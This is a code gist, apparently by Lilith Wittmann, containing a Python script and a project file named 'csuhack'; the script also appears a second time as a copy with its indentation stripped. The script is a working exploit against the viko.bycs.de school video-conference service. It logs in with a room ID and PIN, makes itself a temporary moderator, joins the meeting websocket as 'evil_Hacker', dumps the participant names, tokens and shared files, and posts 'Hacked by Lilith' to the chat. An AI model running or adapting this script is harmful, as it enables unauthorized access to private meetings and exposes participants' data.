LilithWittmann/access_call.py Secret

## access_call.py
import requests
import uuid
from urllib.parse import urlparse
from websocket import create_connection
import json
import jwt
import sys

def get_jwt(authority_server='',room_id="", username="abc", user_session_id="", pin="0"):
    """create a new session"""
    headers = {
        "accept": "*/*",
        'authority': authority_server,
        "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7",
        "content-type": "multipart/form-data; boundary=----WebKitFormBoundary5J7BrPSBB3hM3R9A",
        "sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"",
        "sec-ch-ua-mobile": "?0",
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "cross-site",
        "sec-gpc": "1"
    }
    data =  f"------WebKitFormBoundary5J7BrPSBB3hM3R9A\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n{username}\r\n------WebKitFormBoundary5J7BrPSBB3hM3R9A--\r\n"

    response = requests.post(f"https://{authority_server}/api/fsm/admin/{room_id}/login/{user_session_id}/{pin}", headers=headers, data=data)
    return response.text


def get_video_config(room_id):
    headers = {
        'Connection': 'keep-alive',
        'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        'sec-ch-ua-mobile': '?0',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
        'content-type': 'application/json',
        'Accept': '*/*',
        'Sec-Fetch-Site': 'same-origin',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Dest': 'empty',
        'Referer': f'https://viko.bycs.de/app/raum/{room_id}',
        'Accept-Language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
        'dnt': '1',
        'sec-gpc': '1',
    }

    response = requests.get(f'https://viko.bycs.de/api/gateway/room/{room_id}/status/video', headers=headers)

    return response.json()


def get_files_shared(authority_server='', room_id=None, jwt=None):
    headers = {
        'authority': authority_server,
        'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
        'sec-ch-ua-mobile': '?0',
        'authorization': 'Bearer '+jwt,
        'accept': '*/*',
        'origin': 'https://viko.bycs.de',
        'sec-fetch-site': 'cross-site',
        'sec-fetch-mode': 'cors',
        'sec-fetch-dest': 'empty',
        'referer': 'https://viko.bycs.de/',
        'accept-language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
        'dnt': '1',
        'sec-gpc': '1',
    }

    response = requests.get(f"https://{authority_server}/api/fsm/room/{room_id}/file", headers=headers)

    return response.json()


def make_mod(authority_server='', jwt="", room_id="", user_id=""):
    headers = {
        'authority': authority_server,
        'content-length': '0',
        'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
        'sec-ch-ua-mobile': '?0',
        'authorization': 'Bearer '+jwt,
        'accept': '*/*',
        'origin': 'https://viko.bycs.de',
        'sec-fetch-site': 'cross-site',
        'sec-fetch-mode': 'cors',
        'sec-fetch-dest': 'empty',
        'referer': 'https://viko.bycs.de/',
        'accept-language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
        'dnt': '1',
        'sec-gpc': '1',
    }

    response = requests.post(f"https://{authority_server}/api/fsm/room/{room_id}/config/tempModerator/{user_id}/true", headers=headers)
    return response.text

# set the user that should try to join
ROOM_ID = sys.argv[1]
PIN = sys.argv[2]
USERNAME = "evil_Hacker"


# get the viko config
video_config = get_video_config(ROOM_ID)
print(video_config)
parsed_uri = urlparse(video_config["fsm"])
# parse the active server
server = parsed_uri.netloc


# generate random session
session_user_id = uuid.uuid4()

# get the current jwt
print("Our JWT:")
jwt_token = get_jwt(server,ROOM_ID, USERNAME, str(session_user_id), PIN)
print(jwt_token)

# extract the user id out of our jwt
decoded_jwt = jwt.decode(jwt_token, options={"verify_signature": False}, algorithms=["HS512"])
print(decoded_jwt)
ws_connection_id = decoded_jwt["jti"]


# make moderator
print(make_mod(server, jwt_token, ROOM_ID,  ws_connection_id))


# create ws connection to the visavid websocket (not janus…)
con = create_connection(f"wss://{server}/websockets/{ROOM_ID}/{ws_connection_id}")

# authenticate as a user in the meeting room
con.send('{"type":"auth","name":"'+USERNAME+'","userId":"'+ws_connection_id+'","token":"'+jwt_token+'","sessionId":"'+str(uuid.uuid4())+'","t":"'+str(uuid.uuid4())+'","anon":false}')
print(con.recv())


# get list of participants
con.send('{"request":"participants"}')
participants = con.recv()
participants = json.loads(participants)

# extract Janus Token
print(f"\nYour Janus Token is: {participants['token']} \n")

# extract user currently in the room
print(f"Users in the room:")
for u in participants["users"]:
    print(f"User:{u['name']}  ({u['id']}) ")


print("\n-----------\n")

print("Dump: ")
print(participants)

print("\n-----------\n")
print("Files shared: ")

print(get_files_shared(authority_server=server, room_id=ROOM_ID, jwt=jwt_token))

con.send('{"request":"chatMessage","text":"Hacked by Lilith"}')

print(con.recv())

## pyproject.toml
[tool.poetry]
name = "csuhack"
version = "0.1.0"
description = ""
authors = ["Lilith Wittmann <mail@lilithwittmann.de>"]

[tool.poetry.dependencies]
python = "^3.7"
requests = "^2.25.1"
websocket = "^0.2.1"
websocket-client = "^1.1.0"
PyJWT = "^2.1.0"

[tool.poetry.dev-dependencies]

[build-system]
requires = ["poetry-core>=1.0.0"]
build-backend = "poetry.core.masonry.api"
	import requests
	import uuid
	from urllib.parse import urlparse
	from websocket import create_connection
	import json
	import jwt
	import sys

	def get_jwt(authority_server='',room_id="", username="abc", user_session_id="", pin="0"):
	"""create a new session"""
	headers = {
	"accept": "/",
	'authority': authority_server,
	"accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7",
	"content-type": "multipart/form-data; boundary=----WebKitFormBoundary5J7BrPSBB3hM3R9A",
	"sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"",
	"sec-ch-ua-mobile": "?0",
	"sec-fetch-dest": "empty",
	"sec-fetch-mode": "cors",
	"sec-fetch-site": "cross-site",
	"sec-gpc": "1"
	}
	data = f"------WebKitFormBoundary5J7BrPSBB3hM3R9A\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n{username}\r\n------WebKitFormBoundary5J7BrPSBB3hM3R9A--\r\n"

	response = requests.post(f"https://{authority_server}/api/fsm/admin/{room_id}/login/{user_session_id}/{pin}", headers=headers, data=data)
	return response.text



	def get_video_config(room_id):
	headers = {
	'Connection': 'keep-alive',
	'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
	'sec-ch-ua-mobile': '?0',
	'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
	'content-type': 'application/json',
	'Accept': '/',
	'Sec-Fetch-Site': 'same-origin',
	'Sec-Fetch-Mode': 'cors',
	'Sec-Fetch-Dest': 'empty',
	'Referer': f'https://viko.bycs.de/app/raum/{room_id}',
	'Accept-Language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
	'dnt': '1',
	'sec-gpc': '1',
	}

	response = requests.get(f'https://viko.bycs.de/api/gateway/room/{room_id}/status/video', headers=headers)

	return response.json()


	def get_files_shared(authority_server='', room_id=None, jwt=None):
	headers = {
	'authority': authority_server,
	'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
	'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
	'sec-ch-ua-mobile': '?0',
	'authorization': 'Bearer '+jwt,
	'accept': '/',
	'origin': 'https://viko.bycs.de',
	'sec-fetch-site': 'cross-site',
	'sec-fetch-mode': 'cors',
	'sec-fetch-dest': 'empty',
	'referer': 'https://viko.bycs.de/',
	'accept-language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
	'dnt': '1',
	'sec-gpc': '1',
	}

	response = requests.get(f"https://{authority_server}/api/fsm/room/{room_id}/file", headers=headers)

	return response.json()



	def make_mod(authority_server='', jwt="", room_id="", user_id=""):
	headers = {
	'authority': authority_server,
	'content-length': '0',
	'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
	'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
	'sec-ch-ua-mobile': '?0',
	'authorization': 'Bearer '+jwt,
	'accept': '/',
	'origin': 'https://viko.bycs.de',
	'sec-fetch-site': 'cross-site',
	'sec-fetch-mode': 'cors',
	'sec-fetch-dest': 'empty',
	'referer': 'https://viko.bycs.de/',
	'accept-language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7',
	'dnt': '1',
	'sec-gpc': '1',
	}

	response = requests.post(f"https://{authority_server}/api/fsm/room/{room_id}/config/tempModerator/{user_id}/true", headers=headers)
	return response.text

	# set the user that should try to join
	ROOM_ID = sys.argv[1]
	PIN = sys.argv[2]
	USERNAME = "evil_Hacker"


	# get the viko config
	video_config = get_video_config(ROOM_ID)
	print(video_config)
	parsed_uri = urlparse(video_config["fsm"])
	# parse the active server
	server = parsed_uri.netloc


	# generate random session
	session_user_id = uuid.uuid4()

	# get the current jwt
	print("Our JWT:")
	jwt_token = get_jwt(server,ROOM_ID, USERNAME, str(session_user_id), PIN)
	print(jwt_token)

	# extract the user id out of our jwt
	decoded_jwt = jwt.decode(jwt_token, options={"verify_signature": False}, algorithms=["HS512"])
	print(decoded_jwt)
	ws_connection_id = decoded_jwt["jti"]


	# make moderator
	print(make_mod(server, jwt_token, ROOM_ID, ws_connection_id))


	# create ws connection to the visavid websocket (not janus…)
	con = create_connection(f"wss://{server}/websockets/{ROOM_ID}/{ws_connection_id}")

	# authenticate as a user in the meeting room
	con.send('{"type":"auth","name":"'+USERNAME+'","userId":"'+ws_connection_id+'","token":"'+jwt_token+'","sessionId":"'+str(uuid.uuid4())+'","t":"'+str(uuid.uuid4())+'","anon":false}')
	print(con.recv())


	# get list of participants
	con.send('{"request":"participants"}')
	participants = con.recv()
	participants = json.loads(participants)

	# extract Janus Token
	print(f"\nYour Janus Token is: {participants['token']} \n")

	# extract user currently in the room
	print(f"Users in the room:")
	for u in participants["users"]:
	print(f"User:{u['name']} ({u['id']}) ")


	print("\n-----------\n")

	print("Dump: ")
	print(participants)

	print("\n-----------\n")
	print("Files shared: ")

	print(get_files_shared(authority_server=server, room_id=ROOM_ID, jwt=jwt_token))

	con.send('{"request":"chatMessage","text":"Hacked by Lilith"}')

	print(con.recv())
	[tool.poetry]
	name = "csuhack"
	version = "0.1.0"
	description = ""
	authors = ["Lilith Wittmann <mail@lilithwittmann.de>"]

	[tool.poetry.dependencies]
	python = "^3.7"
	requests = "^2.25.1"
	websocket = "^0.2.1"
	websocket-client = "^1.1.0"
	PyJWT = "^2.1.0"

	[tool.poetry.dev-dependencies]

	[build-system]
	requires = ["poetry-core>=1.0.0"]
	build-backend = "poetry.core.masonry.api"